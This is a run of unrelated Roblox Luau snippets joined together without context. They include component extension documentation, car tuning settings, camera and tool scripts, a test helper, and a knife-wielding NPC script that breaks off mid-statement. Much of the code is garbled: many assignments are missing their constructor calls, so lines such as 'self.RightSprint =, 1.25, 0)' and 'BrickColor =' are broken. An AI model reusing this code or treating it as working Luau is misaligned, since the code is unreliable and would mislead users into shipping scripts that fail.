--[=[ @interface Extension @within Component .ShouldConstruct ExtensionConstructFn? .Constructing ExtensionFn? .Constructed ExtensionFn? .Starting ExtensionFn? .Started ExtensionFn? .Stopping ExtensionFn? .Stopped ExtensionFn? An extension allows the ability to extend the behavior of components. This is useful for adding injection systems or extending the behavior of components by wrapping around component lifecycle methods. A special `ShouldConstruct` function can be used to indicate if the component should actually be created. This must return `true` or `false`. A component with multiple `ShouldConstruct` extension functions must have them _all_ return `true` in order for the component to be constructed. The `ShouldConstruct` function runs _before_ all other extension functions and component lifecycle methods. For instance, an extension could be created to simply log when the various lifecycle stages run on the component: ```lua local Logger = {} function Logger.Constructing(component) print("Constructing", component) end function Logger.Constructed(component) print("Constructed", component) end function Logger.Starting(component) print("Starting", component) end function Logger.Started(component) print("Started", component) end function Logger.Stopping(component) print("Stopping", component) end function Logger.Stopped(component) print("Stopped", component) end local MyComponent ={Tag = "MyComponent", Extensions = {Logger}}) ``` Sometimes it is useful for an extension to control whether or not a component should be constructed. For instance, if a component on the client should only be instantiated for the local player, an extension might look like this, assuming the instance has an attribute linking it to the player's UserId: ```lua local player = game:GetService("Players").LocalPlayer local OnlyLocalPlayer = {} function OnlyLocalPlayer.ShouldConstruct(component) local ownerId = component.Instance:GetAttribute("OwnerId") return ownerId == player.UserId end local MyComponent ={Tag = "MyComponent", Extensions = {OnlyLocalPlayer}}) ``` ]=]
type Extension = { ShouldConstruct: ExtensionConstructFn?, Constructing: ExtensionFn?, Constructed: ExtensionFn?, Starting: ExtensionFn?, Started: ExtensionFn?, Stopping: ExtensionFn?, Stopped: ExtensionFn?, }
--[[ This was created by realgms took some inspiration from ER:LC on the ui watch my yt video on how to set it up ]]
local part = script.Parent part.Touched:Connect(function(hit) script.Parent.BeingTouched.Value = true -- set the flag to true when the part is touched end) part.TouchEnded:Connect(function(hit) script.Parent.BeingTouched.Value = false -- set the flag to false when the part is no longer being touched end)
--[=[ @param instance Instance @return RBXScriptConnection Attaches the trove to a Roblox instance. Once this instance is removed from the game (parent or ancestor's parent set to `nil`), the trove will automatically clean up. :::caution Will throw an error if `instance` is not a descendant of the game hierarchy. ::: ]=]
function Trove:AttachToInstance(instance: Instance) assert(instance:IsDescendantOf(game), "Instance is not a descendant of the game hierarchy") return self:Connect(instance.Destroying, function() self:Destroy() end) end
------//Sprinting Animations
self.RightSprint =, 1.25, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)); self.LeftSprint =,1,-0.6) * CFrame.Angles(math.rad(-45),math.rad(15),math.rad(-25)); self.RightElbowSprint =,-0.45,-.25) * CFrame.Angles(math.rad(-80), math.rad(0), math.rad(0)); self.LeftElbowSprint =,0,0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)); self.RightWristSprint =,0,0.15) * CFrame.Angles(math.rad(20), math.rad(0), math.rad(0)); self.LeftWristSprint =,0,0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)); return self
--[[ \\\ Returns a consistant UID from a string, based on an additive string.byte per character Functions.StringByte( string, <-- |REQ| String ) --]]
return function(str) --- Vars local int = 0 --- Convert each character to byte and add it up for i = 1, string.len(str) do int = int + string.byte(string.sub(str, i, i)) end -- return int end
-- [ SETTINGS ] --
local statsName = "Minutes" -- Your stats name local maxItems = 100 -- Max number of items to be displayed on the leaderboard local minValueDisplay = 1 -- Any numbers lower than this will be excluded local maxValueDisplay = 10e15 -- (10 ^ 15) Any numbers higher than this will be excluded local abbreviateValue = true -- The displayed number gets abbreviated to make it "human readable" local updateEvery = 60 -- (in seconds) How often the leaderboard has to update local headingColor = Color3.fromRGB(25, 181, 254) -- The background color of the heading
tool.Unequipped:Connect(function() print("The tool was unequipped") end) tool.Deactivated:Connect(function() print("The tool has been deactivated") end)
--[[ To add people to your whitelist go to the whitelist module and insert people to the table --]]
script.AdminEvent.Parent = game.ReplicatedStorage script.Whitelist.Parent = game.ReplicatedStorage script.Admin.Parent = game.ServerScriptService script.AdminPanel.Parent = game.StarterGui
end function KeyUI:remove(plr,Name) for i,v in pairs(plr.PlayerGui:WaitForChild("UI").Main.Keys.Holder:GetChildren()) do if v.Name == Name then v:destroy() end end end function KeyUI:Get(plr,name) return plr.PlayerGui:WaitForChild("UI").Main.Keys.Holder:FindFirstChild(name) end return KeyUI
--Torque Curve Tune.Horsepower = 200 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 7000 -- Use sliders to manipulate values Tune.Redline = 7700 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 6500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
game:GetService("Players").PlayerAdded:Connect(function(player) player.CharacterAdded:Connect(character_added) end)
debounce = false function onTouch(hit) if game.Players:FindFirstChild(hit.Parent.Name) ~= nil and debounce == false then local player = game.Players:FindFirstChild(hit.Parent.Name) local c = player.Character:GetChildren() debounce = true for i=1, #c do if (c[i].className == "Hat") or c[i].Name == "Character" then c[i]:Destroy() end end player.Character.Torso.Transparency = 1 player.Character:FindFirstChild("Left Arm").Transparency = 1 player.Character:FindFirstChild("Left Leg").Transparency = 1 player.Character:FindFirstChild("Right Arm").Transparency = 1 player.Character:FindFirstChild("Right Leg").Transparency = 1 player.Character.Humanoid.WalkSpeed = (Speed) -- You can change how fast players walk as this character! local hide ="SpecialMesh") hide.MeshType = "FileMesh" MeshId = "" hide.Parent = player.Character.Head local p = script.Parent.Parent:FindFirstChild("Character"):clone() p.Parent = player.Character p.CFrame = p.Anchored = false local Y ="Weld") Y.Part0 = player.Character.Torso Y.Part1 = p Y.Parent = Y.Part0 itemlist = script.Parent:FindFirstChild("StartTools"):GetChildren() if #itemlist ~= 0 then for i= 1, #itemlist do local itemc = itemlist[i]:clone() itemc.Parent = player.Backpack end end wait(1) debounce = false end end script.Parent.Touched:connect(onTouch)
--Rescripted by Luckymaxer
Tool = script.Parent Handle = Tool:WaitForChild("Handle") Players = game:GetService("Players") Debris = game:GetService("Debris") Speed = 100 Duration = 1 NozzleOffset =, 0.4, -1.1) Sounds = { Fire = Handle:WaitForChild("Fire"), Reload = Handle:WaitForChild("Reload"), HitFade = Handle:WaitForChild("HitFade") } PointLight = Handle:WaitForChild("PointLight") ServerControl = (Tool:FindFirstChild("ServerControl") or"RemoteFunction")) ServerControl.Name = "ServerControl" ServerControl.Parent = Tool ClientControl = (Tool:FindFirstChild("ClientControl") or"RemoteFunction")) ClientControl.Name = "ClientControl" ClientControl.Parent = Tool ServerControl.OnServerInvoke = (function(player, Mode, Value, arg) if player ~= Player or Humanoid.Health == 0 or not Tool.Enabled then return end if Mode == "Click" and Value then Activated(arg) end end) function InvokeClient(Mode, Value) pcall(function() ClientControl:InvokeClient(Player, Mode, Value) end) end function TagHumanoid(humanoid, player) local Creator_Tag ="ObjectValue") Creator_Tag.Name = "creator" Creator_Tag.Value = player Debris:AddItem(Creator_Tag, 2) Creator_Tag.Parent = humanoid end function UntagHumanoid(humanoid) for i, v in pairs(humanoid:GetChildren()) do if v:IsA("ObjectValue") and v.Name == "creator" then v:Destroy() end end end function FindCharacterAncestor(Parent) if Parent and Parent ~= game:GetService("Workspace") then local humanoid = Parent:FindFirstChild("Humanoid") if humanoid then return Parent, humanoid else return FindCharacterAncestor(Parent.Parent) end end return nil end function GetTransparentsRecursive(Parent, PartsTable) local PartsTable = (PartsTable or {}) for i, v in pairs(Parent:GetChildren()) do local TransparencyExists = false pcall(function() local Transparency = v["Transparency"] if Transparency then TransparencyExists = true end end) if TransparencyExists then table.insert(PartsTable, v) end GetTransparentsRecursive(v, PartsTable) end return PartsTable end function SelectionBoxify(Object) local SelectionBox ="SelectionBox") SelectionBox.Adornee = Object SelectionBox.Color ="Really red") SelectionBox.Parent = Object return SelectionBox end local function Light(Object) local Light = PointLight:Clone() Light.Range = (Light.Range + 2) Light.Parent = Object end function FadeOutObjects(Objects, FadeIncrement) repeat local LastObject = nil for i, v in pairs(Objects) do v.Transparency = (v.Transparency + FadeIncrement) LastObject = v end wait() until LastObject.Transparency >= 1 or not LastObject end function Dematerialize(character, humanoid, FirstPart) if not character or not humanoid then return end humanoid.WalkSpeed = 0 local Parts = {} for i, v in pairs(character:GetChildren()) do if v:IsA("BasePart") then v.Anchored = true table.insert(Parts, v) elseif v:IsA("LocalScript") or v:IsA("Script") then v:Destroy() end end local SelectionBoxes = {} local FirstSelectionBox = SelectionBoxify(FirstPart) Light(FirstPart) wait(0.05) for i, v in pairs(Parts) do if v ~= FirstPart then table.insert(SelectionBoxes, SelectionBoxify(v)) Light(v) end end local ObjectsWithTransparency = GetTransparentsRecursive(character) FadeOutObjects(ObjectsWithTransparency, 0.1) wait(0.5) character:BreakJoints() humanoid.Health = 0 Debris:AddItem(character, 2) local FadeIncrement = 0.05 delay(0.2, function() FadeOutObjects({FirstSelectionBox}, FadeIncrement) if character and character.Parent then character:Destroy() end end) FadeOutObjects(SelectionBoxes, FadeIncrement) end function Touched(Projectile, Hit) if not Hit or not Hit.Parent then return end local character, humanoid = FindCharacterAncestor(Hit) if character and humanoid and character ~= Character then local ForceFieldExists = false for i, v in pairs(character:GetChildren()) do if v:IsA("ForceField") then ForceFieldExists = true end end if not ForceFieldExists then if Projectile then local HitFadeSound = Projectile:FindFirstChild(Sounds.HitFade.Name) local torso = humanoid.Torso if HitFadeSound and torso then HitFadeSound.Parent = torso HitFadeSound:Play() end end Dematerialize(character, humanoid, Hit) end if Projectile and Projectile.Parent then Projectile:Destroy() end end end function Equipped() Character = Tool.Parent Player = Players:GetPlayerFromCharacter(Character) Humanoid = Character:FindFirstChild("Humanoid") if not Player or not Humanoid or Humanoid.Health == 0 then return end end function Activated(target) if Tool.Enabled and Humanoid.Health > 0 then Tool.Enabled = false InvokeClient("PlaySound", Sounds.Fire) local HandleCFrame = Handle.CFrame local FiringPoint = HandleCFrame.p + HandleCFrame:vectorToWorldSpace(NozzleOffset) local ShotCFrame =, target) local LaserShotClone = BaseShot:Clone() LaserShotClone.CFrame = ShotCFrame + (ShotCFrame.lookVector * (BaseShot.Size.Z / 2)) local BodyVelocity ="BodyVelocity") BodyVelocity.velocity = ShotCFrame.lookVector * Speed BodyVelocity.Parent = LaserShotClone LaserShotClone.Touched:connect(function(Hit) if not Hit or not Hit.Parent then return end Touched(LaserShotClone, Hit) end) Debris:AddItem(LaserShotClone, Duration) LaserShotClone.Parent = game:GetService("Workspace") wait(0.6) -- FireSound length InvokeClient("PlaySound", Sounds.Reload) wait(0.75) -- ReloadSound length Tool.Enabled = true end end function Unequipped() end BaseShot ="Part") BaseShot.Name = "Effect" BaseShot.BrickColor ="Really red") BaseShot.Material = Enum.Material.Plastic BaseShot.Shape = Enum.PartType.Block BaseShot.TopSurface = Enum.SurfaceType.Smooth BaseShot.BottomSurface = Enum.SurfaceType.Smooth BaseShot.FormFactor = Enum.FormFactor.Custom BaseShot.Size =, 0.2, 3) BaseShot.CanCollide = false BaseShot.Locked = true SelectionBoxify(BaseShot) Light(BaseShot) BaseShotSound = Sounds.HitFade:Clone() BaseShotSound.Parent = BaseShot Tool.Equipped:connect(Equipped) Tool.Unequipped:connect(Unequipped)
local types = require(script.Parent.Parent.types) type Array<T> = types.Array<T> type Map<K, V> = types.Map<K, V> type Tuple<T, V> = types.Tuple<T, V> return function<T>(value: string | { [string]: T } | Array<T> | Map<any, T>): Array<Tuple<string, T>> assert(value :: any ~= nil, "cannot get entries from a nil value") local valueType = typeof(value) local entries: Array<Tuple<string, T>> = {} if valueType == "table" then for key, keyValue in pairs(value :: { [string]: T } | Array<T>) do -- Luau FIXME: Luau should see entries as Array<any>, given object is [string]: any, but it sees it as Array<Array<string>> despite all the manual annotation table.insert(entries, { key, keyValue }) end elseif valueType == "string" then -- TODO: should we be using utf8.len? for i = 1, string.len(value :: string) do entries[i] = { tostring(i), string.sub(value :: string, i, i) } end end return entries end
--- Internal function that finds an existing hitbox from a given instance -- @param instance object
function Hitbox:_FindHitbox(object: any) for _: number, hitbox: any in ipairs(ActiveHitboxes) do if not hitbox.HitboxPendingRemoval and hitbox.HitboxObject == object then return hitbox end end end
--// Load Assets
-- << Variables >> --
local Player = game:GetService("Players").LocalPlayer local Mouse = Player:GetMouse() local Camera = game:GetService("Workspace").CurrentCamera local UserInputService = game:GetService("UserInputService") local Humanoid = Player.Character:WaitForChild("Humanoid") local bobbing = nil local func1 = 0 local func2 = 0 local func3 = 0 local func4 = 0 local val = 0 local val2 = 0 local int = 10 local int2 = 10 local vect3 =
-- Movement mode standardized to Enum.ComputerCameraMovementMode values
function BaseCamera:SetCameraMovementMode( cameraMovementMode ) self.cameraMovementMode = cameraMovementMode end function BaseCamera:GetCameraMovementMode() return self.cameraMovementMode end function BaseCamera:SetIsMouseLocked(mouseLocked) self.inMouseLockedMode = mouseLocked if not FFlagUserCameraToggle then self:UpdateMouseBehavior() end end function BaseCamera:GetIsMouseLocked() return self.inMouseLockedMode end function BaseCamera:SetMouseLockOffset(offsetVector) self.mouseLockOffset = offsetVector end function BaseCamera:GetMouseLockOffset() return self.mouseLockOffset end function BaseCamera:InFirstPerson() return self.inFirstPerson end function BaseCamera:EnterFirstPerson() -- Overridden in ClassicCamera, the only module which supports FirstPerson end function BaseCamera:LeaveFirstPerson() -- Overridden in ClassicCamera, the only module which supports FirstPerson end
-- Función para desaparecer el bloque
local function disappearBlock() trap.Transparency = 1 -- Establece la transparencia del bloque a 1 para hacerlo invisible trap.CanCollide = false -- Desactiva la colisión del bloque para que los jugadores puedan atravesarlo end
--// Damage Settings
BaseDamage = 43; -- Torso Damage LimbDamage = 34; -- Arms and Legs ArmorDamage = 34; -- How much damage is dealt against armor (Name the armor "Armor") HeadDamage = 62; -- If you set this to 100, there's a chance the player won't die because of the heal script
--[[ Tells whether the current test we're in should be skipped. ]]
function TestSession:shouldSkip() -- If our test tree had any exclusive tests, then normal tests are skipped! if self.hasFocusNodes then for i = #self.nodeStack, 1, -1 do local node = self.nodeStack[i] -- Skipped tests are still skipped if node.planNode.modifier == TestEnum.NodeModifier.Skip then return true end -- Focused tests are the only ones that aren't skipped if node.planNode.modifier == TestEnum.NodeModifier.Focus then return false end end return true else for i = #self.nodeStack, 1, -1 do local node = self.nodeStack[i] if node.planNode.modifier == TestEnum.NodeModifier.Skip then return true end end end return false end
--Rescripted by Luckymaxer
Pie = script.Parent Players = game:GetService("Players") Debris = game:GetService("Debris") Creator = Pie:FindFirstChild("creator") BodyForce = Pie:FindFirstChild("BodyForce") BodyGyro = Pie:FindFirstChild("BodyGyro") HitSound = Pie:FindFirstChild("Hit") Stuck = false Damage = 0 function TagHumanoid(humanoid, player) local Creator_Tag ="ObjectValue") Creator_Tag.Name = "creator" Creator_Tag.Value = player Debris:AddItem(Creator_Tag, 2) Creator_Tag.Parent = humanoid end function UntagHumanoid(humanoid) for i, v in pairs(humanoid:GetChildren()) do if v:IsA("ObjectValue") and v.Name == "creator" then v:Destroy() end end end function Stick(Object, Hit) local Weld ="Weld") Weld.Part0 = Pie Weld.Part1 = Hit local HitPos = Pie.Position local CJ = Weld.C0 = Pie.CFrame:inverse() * CJ Weld.C1 = Hit.CFrame:inverse() * CJ Weld.Parent = Object return Weld end function IsTeamMate(Player1, Player2) return (Player1 and Player2 and not Player1.Neutral and not Player2.Neutral and Player1.TeamColor == Player2.TeamColor) end function Touched(Hit) if not Hit or not Hit.Parent or Stuck then return end local character = Hit.Parent if character:IsA("Hat") or character:IsA("Tool") then character = character.Parent end local CreatorPlayer if Creator and Creator.Value and Creator.Value:IsA("Player") then CreatorPlayer = Creator.Value end if CreatorPlayer and CreatorPlayer.Character == character then return end local player = Players:GetPlayerFromCharacter(character) if CreatorPlayer and player and IsTeamMate(CreatorPlayer, player) then return end Stuck = true PieWeld = Stick(Pie, Hit) if HitSound then HitSound:Play() end for i, v in pairs({BodyForce, BodyGyro}) do if v and v.Parent then v:Destroy() end end local humanoid = character:FindFirstChild("Humanoid") if humanoid and humanoid.Health > 0 then UntagHumanoid(humanoid) if CreatorPlayer then TagHumanoid(humanoid, CreatorPlayer) end humanoid:TakeDamage(Damage) end end Pie.Touched:connect(Touched) for i = 1, 10 do wait(0.1 * i) if BodyGyro and BodyGyro.Parent then local Direction = Pie.Velocity.unit BodyGyro.maxTorque =, 1e4, 1e4) BodyGyro.cframe =, 0, 0), -Direction) end end wait(2) if PieWeld and PieWeld.Parent then PieWeld:Destroy() end wait(8) Debris:AddItem(Pie, 0)
--// Gun Parts
local SFn local ABS, HUGE, FLOOR, CEIL = math.abs, math.huge, math.floor, math.ceil local RAD, SIN, COS, TAN = math.rad, math.sin, math.cos, math.tan local VEC2, V3 =, local CF, CFANG =, CFrame.Angles local INSERT = table.insert local Walking = false local instance = local CFn = local CFa = CFrame.Angles local asin = math.asin local abs = math.abs local min = math.min local max = math.max local random = math.random local OldTick = tick() local t = 0 local Reconum = local sway = local Walk = local WalkRate = 1 local speed = 10 local damper = 1 Walk.s = speed Walk.d = damper Reconum.s = speed Reconum.d = 0.15 sway.s = speed sway.d = damper local WVal = 0.25 local Waval = CFn() local TS = game:GetService('TweenService') local RS = game:GetService("RunService")
-- script.Gyro.Value.Parent = Tool.Parent:findFirstChild("Torso") -- script.Gyro.Value.maxTorque =,math.huge,math.huge)
--mouse.Move:connect(function() onMouseMove(mouse) end) while true do game:GetService("RunService").RenderStepped:wait() onMouseMove(mouse) end end Tool.Equipped:connect(onEquipped)
-- Trove -- Stephen Leitnick -- October 16, 2021
local FN_MARKER = newproxy() local THREAD_MARKER = newproxy() local RunService = game:GetService("RunService") local function GetObjectCleanupFunction(object, cleanupMethod) local t = typeof(object) if t == "function" then return FN_MARKER elseif t == "thread" then return THREAD_MARKER end if cleanupMethod then return cleanupMethod end if t == "Instance" then return "Destroy" elseif t == "RBXScriptConnection" then return "Disconnect" elseif t == "table" then if typeof(object.Destroy) == "function" then return "Destroy" elseif typeof(object.Disconnect) == "function" then return "Disconnect" end end error("Failed to get cleanup function for object " .. t .. ": " .. tostring(object), 3) end local function AssertPromiseLike(object) if type(object) ~= "table" or type(object.getStatus) ~= "function" or type(object.finally) ~= "function" or type(object.cancel) ~= "function" then error("Did not receive a Promise as an argument", 3) end end
-- Game Services
local Configurations = require(game.ServerStorage.Configurations) local TeamManager = require(script.TeamManager) local PlayerManager = require(script.PlayerManager) local MapManager = require(script.MapManager) local TimeManager = require(script.TimeManager) local DisplayManager = require(script.DisplayManager)
--[[ Constants ]]
-- local ZERO_VECTOR3 =,0,0)
-- Now we set the caster values.
local Caster = --Create a new caster object.
-- ROBLOX deviation END
local globsToMatchersMap = :: Map<string, { isMatch: Matcher, negated: boolean }> local picomatchOptions = { dot = true }
--[[ Script Variables ]]
-- while not Players.LocalPlayer do Players.PlayerAdded:wait() end local LocalPlayer = Players.LocalPlayer local Mouse = LocalPlayer:GetMouse() local PlayerGui = LocalPlayer:WaitForChild('PlayerGui') local ScreenGui = nil local ShiftLockIcon = nil local InputCn = nil local IsShiftLockMode = false local IsShiftLocked = false local IsActionBound = false local IsInFirstPerson = false local PreventShiftLock = false -- NEW: used to prevent changes local ShiftLockedBefore = false -- NEW: used to remember past value
-- Windows
local aboutWindow = UI.About -- The window containing all info about the plugin local mainWindow = UI.MainWindow -- The whole plugin itself
--------| Library |--------
local _L; coroutine.wrap(function() _L = require(game.ReplicatedStorage:WaitForChild("Resources")) end)()
--[[[Default Controls]] --Peripheral Deadzones
Tune.Peripherals = { MSteerWidth = 67 , -- Mouse steering control width (0 - 100% of screen width) MSteerDZone = 10 , -- Mouse steering deadzone (0 - 100%) ControlLDZone = 5 , -- Controller steering L-deadzone (0 - 100%) ControlRDZone = 5 , -- Controller steering R-deadzone (0 - 100%) }
Tune.Config = "AWD" --"FWD" , "RWD" , "AWD" --Differential Settings Tune.FDiffSlipThres = 50 -- 1 - 100% (Max threshold of applying full lock determined by deviation from avg speed) Tune.FDiffLockThres = 50 -- 0 - 100% (0 - Bias toward slower wheel, 100 - Bias toward faster wheel) Tune.RDiffSlipThres = 50 -- 1 - 100% Tune.RDiffLockThres = 50 -- 0 - 100% Tune.CDiffSlipThres = 50 -- 1 - 100% [AWD Only] Tune.CDiffLockThres = 50 -- 0 - 100% [AWD Only] --Traction Control Settings Tune.TCSEnabled = true -- Implements TCS Tune.TCSThreshold = 20 -- Slip speed allowed before TCS starts working (in SPS) Tune.TCSGradient = 20 -- Slip speed gradient between 0 to max reduction (in SPS) Tune.TCSLimit = 10 -- Minimum amount of torque at max reduction (in percent)
--------AUDIENCE BACK LEFT--------
game.Workspace.audiencebackleft1.Part1.BrickColor = game.Workspace.audiencebackleft1.Part4.BrickColor = game.Workspace.audiencebackleft1.Part7.BrickColor =
-- emote bindable hook
script:WaitForChild("PlayEmote").OnInvoke = function(emote) -- Only play emotes when idling if pose ~= "Standing" then return end if emoteNames[emote] ~= nil then -- Default emotes playAnimation(emote, EMOTE_TRANSITION_TIME, Humanoid) return true, currentAnimTrack elseif typeof(emote) == "Instance" and emote:IsA("Animation") then -- Non-default emotes playEmote(emote, EMOTE_TRANSITION_TIME, Humanoid) return true, currentAnimTrack end -- Return false to indicate that the emote could not be played return false end script.IdlePose.Event:Connect(function() playAnimation("idle", 0.2, Humanoid) pose = "Standing" end) if Character.Parent ~= nil then -- initialize to idle playAnimation("idle", 0.1, Humanoid) pose = "Standing" end
--[[if JeffTheKillerScript and JeffTheKiller and JeffTheKiller:FindFirstChild("Thumbnail")then]]-- --[[JeffTheKiller:FindFirstChild("Thumbnail"):Destroy();]]-- --[[end;]]
-- local JeffTheKillerHumanoid; for _,Child in pairs(JeffTheKiller:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then JeffTheKillerHumanoid=Child; end; end; local AttackDebounce=false; local JeffTheKillerKnife=JeffTheKiller:FindFirstChild("Knife"); local JeffTheKillerHead=JeffTheKiller:FindFirstChild("Head"); local JeffTheKillerHumanoidRootPart=JeffTheKiller:FindFirstChild("HumanoidRootPart"); local WalkDebounce=false; local Notice=false; local JeffLaughDebounce=false; local MusicDebounce=false; local NoticeDebounce=false; local ChosenMusic; function FindNearestBae() local NoticeDistance=99999e99999; local TargetMain; for _,TargetModel in pairs(Game:GetService("Workspace"):GetChildren())do if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and TargetModel.className=="Model"and TargetModel~=JeffTheKiller and TargetModel.Name~=JeffTheKiller.Name and TargetModel:FindFirstChild("Torso")and TargetModel:FindFirstChild("Head")then local TargetPart=TargetModel:FindFirstChild("Torso"); local FoundHumanoid; for _,Child in pairs(TargetModel:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then FoundHumanoid=Child; end; end; if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<NoticeDistance then TargetMain=TargetPart; NoticeDistance=(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude; local hit,pos=raycast(JeffTheKillerHumanoidRootPart.Position,(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).unit,500) if hit and hit.Parent and hit.Parent.ClassName=="Model"and hit.Parent:FindFirstChild("Torso")and hit.Parent:FindFirstChild("Head")then if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<9 and not AttackDebounce then Spawn(function() AttackDebounce=true; local SwingAnimation=JeffTheKillerHumanoid:LoadAnimation(JeffTheKiller:FindFirstChild("Swing")); local SwingChoice=math.random(1,2); local HitChoice=math.random(1,3); SwingAnimation:Play(); SwingAnimation:AdjustSpeed(1.5); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Swing")then local SwingSound=JeffTheKillerKnife:FindFirstChild("Swing"); SwingSound:Play(); end; Wait(0.3); if TargetModel and TargetPart and FoundHumanoid and FoundHumanoid.Health~=0 and(TargetPart.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<8 then FoundHumanoid:TakeDamage(30); if HitChoice==1 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit"); HitSound:Play(); elseif HitChoice==2 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit"); HitSound:Play(); elseif HitChoice==3 and JeffTheKillerScript and JeffTheKiller and JeffTheKillerKnife and JeffTheKillerKnife:FindFirstChild("Hit")then local HitSound=JeffTheKillerKnife:FindFirstChild("Hit"); HitSound:Play(); end; end; Wait(0.1); AttackDebounce=false; end); end; end; end; end; end; return TargetMain; end; while Wait(0)do local TargetPoint=JeffTheKillerHumanoid.TargetPoint; local Blockage,BlockagePos=RayCast((,,JeffTheKillerHumanoidRootPart.Position.Y,TargetPoint.Z)).lookVector*(JeffTheKillerHumanoidRootPart.Size.Z/2)).p,JeffTheKillerHumanoidRootPart.CFrame.lookVector,(JeffTheKillerHumanoidRootPart.Size.Z*2.5),{JeffTheKiller,JeffTheKiller}) local Jumpable=false; if Blockage then Jumpable=true; if Blockage and Blockage.Parent and Blockage.Parent.ClassName~="Workspace"then local BlockageHumanoid; for _,Child in pairs(Blockage.Parent:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then BlockageHumanoid=Child; end; end; if Blockage and Blockage:IsA("Terrain")then local CellPos=Blockage:WorldToCellPreferSolid((,2,0))); local CellMaterial,CellShape,CellOrientation=Blockage:GetCell(CellPos.X,CellPos.Y,CellPos.Z); if CellMaterial==Enum.CellMaterial.Water then Jumpable=false; end; elseif BlockageHumanoid or Blockage.ClassName=="TrussPart"or Blockage.ClassName=="WedgePart"or Blockage.Name=="Handle"and Blockage.Parent.ClassName=="Hat"or Blockage.Name=="Handle"and Blockage.Parent.ClassName=="Tool"then Jumpable=false; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and not JeffTheKillerHumanoid.Sit and Jumpable then end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHumanoidRootPart and JeffTheKillerHead:FindFirstChild("Step")and (,JeffTheKillerHumanoidRootPart.Velocity.y,0)).magnitude>=5 and not WalkDebounce and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then Spawn(function() WalkDebounce=true; local,,-4,0)); local RayTarget,endPoint=Game:GetService("Workspace"):FindPartOnRay(FiredRay,JeffTheKiller); if RayTarget then JeffTheKillerHead:FindFirstChild("Step"):Play(); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and JeffTheKillerHumanoid.WalkSpeed<17 then Wait(0.5); elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and JeffTheKillerHumanoid.WalkSpeed>17 then Wait(0.2); end end; WalkDebounce=false; end); end; local MainTarget=FindNearestBae(); local FoundHumanoid; if MainTarget then for _,Child in pairs(MainTarget.Parent:GetChildren())do if Child and Child.ClassName=="Humanoid"and Child.Health~=0 then FoundHumanoid=Child; end; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and MainTarget.Parent and FoundHumanoid and FoundHumanoid.Jump then end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<25 then if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Laugh")and not JeffTheKillerHead:FindFirstChild("Laugh").IsPlaying then JeffTheKillerHead:FindFirstChild("Laugh").Volume=1; JeffTheKillerHead:FindFirstChild("Laugh"):Play(); end; elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>25 then if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Laugh")and JeffTheKillerHead:FindFirstChild("Laugh").IsPlaying then if not JeffLaughDebounce then Spawn(function() JeffLaughDebounce=true; repeat Wait(0);if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Laugh")then JeffTheKillerHead:FindFirstChild("Laugh").Volume=JeffTheKillerHead:FindFirstChild("Laugh").Volume-0.1;else break;end;until JeffTheKillerHead:FindFirstChild("Laugh").Volume==0 or JeffTheKillerHead:FindFirstChild("Laugh").Volume<0; JeffTheKillerHead:FindFirstChild("Laugh").Volume=0; JeffTheKillerHead:FindFirstChild("Laugh"):Stop(); JeffLaughDebounce=false; end); end; end; end; if not ChosenMusic and JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 